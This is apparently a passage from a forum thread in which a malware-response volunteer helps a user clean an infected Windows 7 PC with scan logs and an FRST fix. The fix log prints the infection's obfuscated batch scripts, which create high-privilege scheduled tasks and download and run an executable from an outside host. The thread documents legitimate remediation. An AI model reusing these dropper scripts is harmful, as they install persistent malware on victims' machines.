Error: (01/10/2018 03:32:39 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:03:45 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (01/10/2018 03:00:22 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.


System errors:
=============
Error: (01/10/2018 09:46:36 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 21:45:24 on ‎10.‎01.‎2018 was unexpected.

Error: (01/10/2018 03:38:41 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 15:36:22 on ‎10.‎01.‎2018 was unexpected.

Error: (01/10/2018 07:46:35 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 7:12:32 on ‎10.‎01.‎2018 was unexpected.

Error: (01/10/2018 03:48:35 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 3:47:31 on ‎10.‎01.‎2018 was unexpected.

Error: (01/10/2018 03:00:16 AM) (Source: volsnap) (EventID: 25) (User: )
Description: The shadow copies of volume C: were deleted because the shadow copy storage could not grow in time.  Consider reducing the IO load on the system or choose a shadow copy storage volume that is not being shadow copied.

Error: (01/10/2018 02:59:31 AM) (Source: BugCheck) (EventID: 1001) (User: )
Description: The computer has rebooted from a bugcheck.  The bugcheck was: 0x000000f4 (0x0000000000000003, 0xfffffa8018c2db10, 0xfffffa8018c2ddf0, 0xfffff800035d08c0). A dump was saved in: C:\Windows\MEMORY.DMP. Report Id: 011018-10389-01.

Error: (01/10/2018 02:59:19 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 2:57:39 on ‎10.‎01.‎2018 was unexpected.

Error: (01/07/2018 01:54:30 PM) (Source: Ntfs) (EventID: 55) (User: )
Description: The file system structure on the disk is corrupt and unusable.
Please run the chkdsk utility on the volume J:.

Error: (01/06/2018 04:50:28 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 16:48:30 on ‎6.‎01.‎2018 was unexpected.

Error: (01/05/2018 05:20:09 PM) (Source: Ntfs) (EventID: 55) (User: )
Description: The file system structure on the disk is corrupt and unusable.
Please run the chkdsk utility on the volume J:.


==================== Memory info ===========================

Processor: Intel® Core™ i5-2500K CPU @ 3.30GHz
Percentage of memory in use: 28%
Total physical RAM: 16342.25 MB
Available physical RAM: 11670.95 MB
Total Virtual: 32682.68 MB
Available Virtual: 27353.73 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:927.73 GB) (Free:778.85 GB) NTFS
Drive d: () (Fixed) (Total:935.18 GB) (Free:816.72 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 19.8 GB) (Disk ID: D0D1F2E9)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: D56E2658)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=927.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=935.2 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================



BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:32 PM

Posted 11 January 2018 - 08:17 AM

Hi Xaltotun :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Can you provide me the Malwarebytes and Zemana scan logs so I can see what was detected and deleted?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Xaltotun

Xaltotun
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:07:32 PM

Posted 11 January 2018 - 10:44 AM

Today just fiew minutes ago CMD downloader started again...

 

Zemana log

 

Zemana AntiMalware 2.74.5.150 (paigaldatud)

-------------------------------------------------------
Scan Result            : Lõpetatud
Scan Date              : 2018.1.10
Operating System       : Windows 7 64-bit
Processor              : 4X Intel® Core™ i5-2500K CPU @ 3.30GHz
BIOS Mode              : Legacy
CUID                   : 12329C6AEADACA30E8731E
Scan Type              : Süsteemi kontroll
Duration               : 8m 29s
Scanned Objects        : 65468
Detected Objects       : 5
Excluded Objects       : 0
Read Level             : SCSI
Auto Upload            : Sees
Detect All Extensions  : Väljas
Scan Documents         : Väljas
Domain Info            : WORKGROUP,0,2

Detected Objects
-------------------------------------------------------

wrc@avast.com
Status             : Kontrollitud
Object             : %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\wrc@avast.com.xpi
MD5                : 904CC438CF06B7697F59FE962D612781
Publisher          : -
Size               : 707252
Version            : -
Detection          : PUA.FirefoxExt!Gr
Cleaning Action    : Paranda
Related Objects    :
                Brauseri lisa - wrc@avast.com
                Fail - %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\wrc@avast.com.xpi

installed-extensions
Status             : Kontrollitud
Object             : %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\installed-extensions.txt
MD5                : BD9800DF63176DE7473D4EAE37DAFE10
Publisher          : -
Size               : 46
Version            : -
Detection          : PUA.FirefoxExt!Gr
Cleaning Action    : Paranda
Related Objects    :
                Brauseri lisa - installed-extensions
                Fail - %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\installed-extensions.txt

extensions
Status             : Kontrollitud
Object             : %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\extensions.rdf
MD5                : 9C360CE33944BC994AD7A89A70C97FAA
Publisher          : -
Size               : 2747
Version            : -
Detection          : PUA.FirefoxExt!Gr
Cleaning Action    : Paranda
Related Objects    :
                Brauseri lisa - extensions
                Fail - %appdata%\mozilla\firefox\profiles\krkz2nio.default-1500317088253\extensions\extensions.rdf

svchost.exe
Status             : Kontrollitud
Object             : %systemroot%\syswow64\svchost.exe
MD5                : 54A47F6B5E09A77E61649109C6A08866
Publisher          : Microsoft Windows
Size               : 20992
Version            : 6.1.7600.16385
Detection          : Modifitseeritud protsess
Cleaning Action    : Paranda
Related Objects    :
                Protsess - 2888 - C:\Windows\SysWOW64\svchost.exe
                Fail - %systemroot%\syswow64\svchost.exe

mail.ru
Status             : Kontrollitud
Object             : NE->c:\programdata\mail.ru
MD5                : -
Publisher          : -
Size               : -
Version            : -
Detection          : PUA:Win32/Mail.Ru.B!Neng
Cleaning Action    : Karantiin
Related Objects    :
                (null) - (null)


Cleaning Result
-------------------------------------------------------
Cleaned               : 5
Reported as safe      : 0
Failed                : 0
 

 

 

 

 

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 1/10/18
Scan Time: 2:41 AM
Log File: f6253130-f59e-11e7-aa12-902b34d857a5.json
Administrator: Yes

-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3661
License: Free

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Jahikas-Reaktor\Jahikas

-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 259608
Threats Detected: 13
Threats Quarantined: 13
Time Elapsed: 15 min, 55 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 4
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\DZOPERCOMJHAR, Quarantined, [39], [475864],1.0.3661
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{069442D4-A8D4-4DF7-829E-E8C67A418655}, Quarantined, [39], [475864],1.0.3661
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{069442D4-A8D4-4DF7-829E-E8C67A418655}, Quarantined, [39], [475864],1.0.3661
PUP.Optional.MailRu, HKU\S-1-5-21-1345210596-781569937-2744199837-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}, Quarantined, [633], [382913],1.0.3661

Registry Value: 4
PUP.Optional.MailRu, HKU\S-1-5-21-1345210596-781569937-2744199837-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|URL, Quarantined, [633], [382913],1.0.3661
PUP.Optional.MailRu, HKU\S-1-5-21-1345210596-781569937-2744199837-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|FAVICONURLFALLBACK, Quarantined, [633], [382913],1.0.3661
PUP.Optional.MailRu, HKU\S-1-5-21-1345210596-781569937-2744199837-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|SUGGESTIONSURL, Quarantined, [633], [382913],1.0.3661
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{069442D4-A8D4-4DF7-829E-E8C67A418655}|PATH, Quarantined, [39], [475863],1.0.3661

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 0
(No malicious items detected)

File: 5
PUP.Optional.MailRu, C:\USERS\JAHIKAS\FAVORITES\Mail.Ru Агент - используй для общения!.url, Quarantined, [633], [471428],1.0.3661
PUP.Optional.MailRu, C:\USERS\JAHIKAS\FAVORITES\Mail.Ru.url, Quarantined, [633], [471428],1.0.3661
PUP.Optional.StartPage, C:\WINDOWS\SYSTEM32\TASKS\DZOPERCOMJHAR, Quarantined, [39], [475864],1.0.3661
Adware.FileTour, C:\USERS\JAHIKAS\APPDATA\LOCAL\TEMP\IS-3GASI.TMP\F9BC8B9F, Quarantined, [149], [413261],1.0.3661
Adware.FileTour, C:\USERS\JAHIKAS\APPDATA\LOCAL\TEMP\IS-3GASI.TMP\776326A5, Quarantined, [149], [423225],1.0.3661

Physical Sector: 0
(No malicious items detected)


(end)



#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:32 PM

Posted 11 January 2018 - 11:26 AM

Alright follow the instructions below.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located)
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Fix button
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad
  • Copy and paste its content in your next reply

Attached Files


unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 Xaltotun

Xaltotun
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:07:32 PM

Posted 11 January 2018 - 11:38 AM

After it done, computer restarted...

 

Fixlog here

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 02.01.2018
Ran by Jahikas (11-01-2018 18:29:36) Run:1
Running from C:\Users\Jahikas\Desktop\FRST
Loaded Profiles: Jahikas & UpdatusUser (Available Profiles: Jahikas & UpdatusUser)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:

cmd: type "C:\Program Files (x86)\HXFiYSAfe"
cmd: type "C:\Program Files (x86)\HXFiYSAfe.bat"
cmd: type "C:\Program Files (x86)\bFmsiuYoOoOvL"
cmd: type "C:\Program Files (x86)\bFmsiuYoOoOvL.bat"
cmd: type "C:\Users\Jahikas\AppData\Roaming\YoEb"
cmd: type "C:\Users\Jahikas\AppData\Roaming\YoEb.bat"
cmd: type "C:\Windows\SysWOW64\hicAAmW"
cmd: type "C:\Windows\SysWOW64\hicAAmW.bat"

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION

Task: {6C430DDE-4ADF-4922-B91E-872CCAC5D507} - System32\Tasks\PSEWDZ => C:\Users\Jahikas\oFIF.exe [2016-06-12] (Microsoft Corporation)
Task: {85FB7A0B-0200-4CF4-A545-AA1C0CBF65A3} - System32\Tasks\SyHTyUPcnUkIY => C:\Program Files (x86)\bFmsiuYoOoOvL.bat [2009-07-14] () <==== ATTENTION
Task: {98C651FF-B20D-4DAE-8C2B-75BC6AB62AC0} - System32\Tasks\hYOuioDYluo => C:\Windows\SysWOW64\hicAAmW.bat [2009-07-14] () <==== ATTENTION

C:\Program Files (x86)\HXFiYSAfe
C:\Program Files (x86)\HXFiYSAfe.bat
C:\Program Files (x86)\bFmsiuYoOoOvL
C:\Program Files (x86)\bFmsiuYoOoOvL.bat
C:\Users\Jahikas\oFIF.exe
C:\Users\Jahikas\AppData\Local\WMI.ini
C:\Users\Jahikas\AppData\Roaming\YoEb
C:\Users\Jahikas\AppData\Roaming\YoEb.bat
C:\Windows\SysWOW64\Yugjm.exe
C:\Windows\SysWOW64\hicAAmW
C:\Windows\SysWOW64\hicAAmW.bat

EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.

========= type "C:\Program Files (x86)\HXFiYSAfe" =========

@ech%OiYDupYT%o o%ZIaAqpUFEoEe%ff
copy /y "C:\Us%capAZF%ers\Jahikas\App%YzoMGeezFI%Da%IKAXie%ta\%aUwWMIUY%R%eGEoaIaeOIxsU%oam%DEyUtm%ing\YoE%uzqaX%b" "C:\Users\Ja%OIYUVzybkvU%hikas\Ap%aaPaomobltt%pData\Roaming\YoEb.ba%yiaQsaY%t"
copy /y "C:\Program Files (x8%yofaeerEUU%6)\bFmsiuYoOoOv%ibWOL%L" "C:\Program Files (x8%qiKuyeeVfp%6)\%KaueDYAuo%bFmsiuYoOoOvL.bat"
schtasks /%qouWi%create /tn "S%ifbjVG%yHTyUPcnUkI%oiAtLAU%Y" /tr "'C:\P%IwoKSosYcTOU%rogram Files (x86)\bFmsiuYoOoOvL%PErG%.bat%peSUYZTcyOO%' " /sc ONL%iSeYiYuYK%OGON /delay 0003:00 /rl high%saiuYMYi%est /f
set ruHIoeIc%yrIO%EziF=%rAnDOm%%RaNdOM%
"C:\Windows\S%eyIO%ysWOW64\Yugjm.exe%aiUryAu%" /TRa%NOuvieYRI%nsFER GzEUM /Do%ULEeYauScQoH%WNLoaD /priOrITy higH http://simstrackin%DyTZbiy%g.info%HAOyIXo%/2ecsavvx52qm.zip "C:\U%SGsaBbwIS%ser%aEoF%s\Jahik%kxYa%as\AppData\L%FTNq%ocal\Temp\uqVyaatI%meyU%urrBUYNGO%.zip"
renam%RTfue%e "C:\Users\Jah%lANu%ikas\App%VoEEPEtqeyoGa%Dat%lWQhRMq%a\Local\Temp\uqVyaatIurrB.zip" %ruHIoeIcEziF%.exe
cmd /c "%OYOjMITRoYxy%"C%XodhjrsHw%:\Us%PaevhiPaDu%ers\Jahikas\AppDat%UnutU%a\Lo%zAUAKiUAqRs%cal\Temp\%ruHIoeIcEziF%.exe" i"
========= End of CMD: =========


========= type "C:\Program Files (x86)\HXFiYSAfe.bat" =========

@ech%OiYDupYT%o o%ZIaAqpUFEoEe%ff
copy /y "C:\Us%capAZF%ers\Jahikas\App%YzoMGeezFI%Da%IKAXie%ta\%aUwWMIUY%R%eGEoaIaeOIxsU%oam%DEyUtm%ing\YoE%uzqaX%b" "C:\Users\Ja%OIYUVzybkvU%hikas\Ap%aaPaomobltt%pData\Roaming\YoEb.ba%yiaQsaY%t"
copy /y "C:\Program Files (x8%yofaeerEUU%6)\bFmsiuYoOoOv%ibWOL%L" "C:\Program Files (x8%qiKuyeeVfp%6)\%KaueDYAuo%bFmsiuYoOoOvL.bat"
schtasks /%qouWi%create /tn "S%ifbjVG%yHTyUPcnUkI%oiAtLAU%Y" /tr "'C:\P%IwoKSosYcTOU%rogram Files (x86)\bFmsiuYoOoOvL%PErG%.bat%peSUYZTcyOO%' " /sc ONL%iSeYiYuYK%OGON /delay 0003:00 /rl high%saiuYMYi%est /f
set ruHIoeIc%yrIO%EziF=%rAnDOm%%RaNdOM%
"C:\Windows\S%eyIO%ysWOW64\Yugjm.exe%aiUryAu%" /TRa%NOuvieYRI%nsFER GzEUM /Do%ULEeYauScQoH%WNLoaD /priOrITy higH http://simstrackin%DyTZbiy%g.info%HAOyIXo%/2ecsavvx52qm.zip "C:\U%SGsaBbwIS%ser%aEoF%s\Jahik%kxYa%as\AppData\L%FTNq%ocal\Temp\uqVyaatI%meyU%urrBUYNGO%.zip"
renam%RTfue%e "C:\Users\Jah%lANu%ikas\App%VoEEPEtqeyoGa%Dat%lWQhRMq%a\Local\Temp\uqVyaatIurrB.zip" %ruHIoeIcEziF%.exe
cmd /c "%OYOjMITRoYxy%"C%XodhjrsHw%:\Us%PaevhiPaDu%ers\Jahikas\AppDat%UnutU%a\Lo%zAUAKiUAqRs%cal\Temp\%ruHIoeIcEziF%.exe" i"
========= End of CMD: =========


========= type "C:\Program Files (x86)\bFmsiuYoOoOvL" =========

start /min cmd /c "C:\Users\Jahikas\AppData\Roaming\YoEb.bat"
exit
========= End of CMD: =========


========= type "C:\Program Files (x86)\bFmsiuYoOoOvL.bat" =========

start /min cmd /c "C:\Users\Jahikas\AppData\Roaming\YoEb.bat"
exit
========= End of CMD: =========


========= type "C:\Users\Jahikas\AppData\Roaming\YoEb" =========

@e%KrquPaUyO%cho off
copy /y "C:\Program F%bAHuYXeCY%iles (x86)\HX%BUBH%F%QoYUGx%iYSAfe" "C:\Pr%RXoZzNXOuRcDy%ogram Files (x86)\HX%oaIDUeixYny%FiYSAf%eEUU%e.bat%XMoiu%" YOeORql%
copy /y "C:\Win%BEymO%dows\S%lIYyzWUAuOyiq%ysWOW64%cYyOGoa%\hicA%OiePceUYESEi%AmW%YsuTKaizKh%" "C:\Win%lXyyyzoSDg%dows\Sys%etiQoOQEuXYoC%WO%YjEh%W64\%IoOaXHEPyEA%hicA%oLsuCAaEyAhju%Am%kuNoIYqUIi%W.%MOIuIwI%bat"%OYYQ%
s%NjEoo%ch%kkOaXihAOEed%tasks /create /tn "hYOuioDYl%InyMOOIYwa%u௮w%o" /tr "'%icfHYE%C:\Wi%EIPOE%ndows\SysWOW64\hicAAmW.%YauteUiIQE%bat' " /sc minute /mo 180 /rl high%YbthYO%est /f
set YHGOowNAaueee=%raNdOm%%rAnDoM%
"%bcyoIax%C:\W%kkyAowu%indows\S%OcYxaY%ysWOW64\Yugj%vytoD%m%aAuUIIQrztoNZ%.ex%KcAXqEVyo%e%ebcauaSVet%" /TrAnSfer d%agoLnxOmH%yEF /%EyAUjLO%dowNLOad /prIOrITY hIGh http://sim%rWObnyeaIt%s%WIMrifXBeEC%tracking.info/2ecsav%auiuaOUiQAg%vx52qm.zip "C:\Users\Jahikas\AppData\Local\Te%WokiuoI%mp\TaE%BrkR%XQ.zip"
rename "C:\Users\Jahikas\AppData\Loc%yyUzEIzdTBa%al%iAYFStDa%\Temp\TaEXQ.zip" %YHGOowNAaueee%.exe
cmd /%uYyTEOiTduA%c ""C:\User IKYEAuUeIlw%s\Jahikas\%xApy%AppData\L%yCujaJiIi%o%yeUEaUk%cal\TemÚIEULMOE%p\%YHGOowNAaueee%.exe" i"
========= End of CMD: =========


========= type "C:\Users\Jahikas\AppData\Roaming\YoEb.bat" =========

@e%KrquPaUyO%cho off
copy /y "C:\Program F%bAHuYXeCY%iles (x86)\HX%BUBH%F%QoYUGx%iYSAfe" "C:\Pr%RXoZzNXOuRcDy%ogram Files (x86)\HX%oaIDUeixYny%FiYSAf%eEUU%e.bat%XMoiu%" YOeORql%
copy /y "C:\Win%BEymO%dows\S%lIYyzWUAuOyiq%ysWOW64%cYyOGoa%\hicA%OiePceUYESEi%AmW%YsuTKaizKh%" "C:\Win%lXyyyzoSDg%dows\Sys%etiQoOQEuXYoC%WO%YjEh%W64\%IoOaXHEPyEA%hicA%oLsuCAaEyAhju%Am%kuNoIYqUIi%W.%MOIuIwI%bat"%OYYQ%
s%NjEoo%ch%kkOaXihAOEed%tasks /create /tn "hYOuioDYl%InyMOOIYwa%u௮w%o" /tr "'%icfHYE%C:\Wi%EIPOE%ndows\SysWOW64\hicAAmW.%YauteUiIQE%bat' " /sc minute /mo 180 /rl high%YbthYO%est /f
set YHGOowNAaueee=%raNdOm%%rAnDoM%
"%bcyoIax%C:\W%kkyAowu%indows\S%OcYxaY%ysWOW64\Yugj%vytoD%m%aAuUIIQrztoNZ%.ex%KcAXqEVyo%e%ebcauaSVet%" /TrAnSfer d%agoLnxOmH%yEF /%EyAUjLO%dowNLOad /prIOrITY hIGh http://sim%rWObnyeaIt%s%WIMrifXBeEC%tracking.info/2ecsav%auiuaOUiQAg%vx52qm.zip "C:\Users\Jahikas\AppData\Local\Te%WokiuoI%mp\TaE%BrkR%XQ.zip"
rename "C:\Users\Jahikas\AppData\Loc%yyUzEIzdTBa%al%iAYFStDa%\Temp\TaEXQ.zip" %YHGOowNAaueee%.exe
cmd /%uYyTEOiTduA%c ""C:\User IKYEAuUeIlw%s\Jahikas\%xApy%AppData\L%yCujaJiIi%o%yeUEaUk%cal\TemÚIEULMOE%p\%YHGOowNAaueee%.exe" i"
========= End of CMD: =========


========= type "C:\Windows\SysWOW64\hicAAmW" =========

start /min cmd /c "C:\Program Files (x86)\HXFiYSAfe.bat"
exit
========= End of CMD: =========


========= type "C:\Windows\SysWOW64\hicAAmW.bat" =========

start /min cmd /c "C:\Program Files (x86)\HXFiYSAfe.bat"
exit
========= End of CMD: =========

"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6C430DDE-4ADF-4922-B91E-872CCAC5D507} => could not remove key. ErrorCode1: 0x00000002
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6C430DDE-4ADF-4922-B91E-872CCAC5D507}" => removed successfully
C:\Windows\System32\Tasks\PSEWDZ => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PSEWDZ" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{85FB7A0B-0200-4CF4-A545-AA1C0CBF65A3}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{85FB7A0B-0200-4CF4-A545-AA1C0CBF65A3}" => removed successfully
C:\Windows\System32\Tasks\SyHTyUPcnUkIY => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SyHTyUPcnUkIY" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{98C651FF-B20D-4DAE-8C2B-75BC6AB62AC0}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{98C651FF-B20D-4DAE-8C2B-75BC6AB62AC0}" => removed successfully
C:\Windows\System32\Tasks\hYOuioDYluo => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\hYOuioDYluo" => removed successfully
C:\Program Files (x86)\HXFiYSAfe => moved successfully
C:\Program Files (x86)\HXFiYSAfe.bat => moved successfully
C:\Program Files (x86)\bFmsiuYoOoOvL => moved successfully
C:\Program Files (x86)\bFmsiuYoOoOvL.bat => moved successfully
C:\Users\Jahikas\oFIF.exe => moved successfully
C:\Users\Jahikas\AppData\Local\WMI.ini => moved successfully
C:\Users\Jahikas\AppData\Roaming\YoEb => moved successfully
C:\Users\Jahikas\AppData\Roaming\YoEb.bat => moved successfully
C:\Windows\SysWOW64\Yugjm.exe => moved successfully
C:\Windows\SysWOW64\hicAAmW => moved successfully
C:\Windows\SysWOW64\hicAAmW.bat => moved successfully

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 177571268 B
Java, Flash, Steam htmlcache => 2277 B
Windows/system/drivers => 81608120 B
Edge => 0 B
Chrome => 0 B
Firefox => 932947817 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 16802 B
systemprofile32 => 66228 B
LocalService => 0 B
NetworkService => 0 B
Jahikas => 776525812 B
UpdatusUser => 0 B

RecycleBin => 0 B
EmptyTemp: => 1.8 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 18:30:05 ====



#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:32 PM

Posted 11 January 2018 - 11:44 AM

Good! Did you get any CMD prompts on startup?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 Xaltotun

Xaltotun
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:07:32 PM

Posted 11 January 2018 - 11:49 AM

No, ill let know if it comes..

Im wery grateful for help, thank you wery much :)



#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:32 PM

Posted 11 January 2018 - 01:02 PM

No problem Xaltotun, you're welcome!

Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

BWuhenj.pngDelFix
Follow the instructions below to download and execute DelFix.
  • Download DelFix and move the executable to your Desktop
  • Right-click on DelFix.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Check the following options :
    • Activate UAC
    • Remove disinfection tools
    • Create registry backup
    • Purge system restore
    • Reset system settings
  • Once all the options mentionned above are checked, click on Run
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply
Qt25440.pngTips, tricks, advice and recommendations

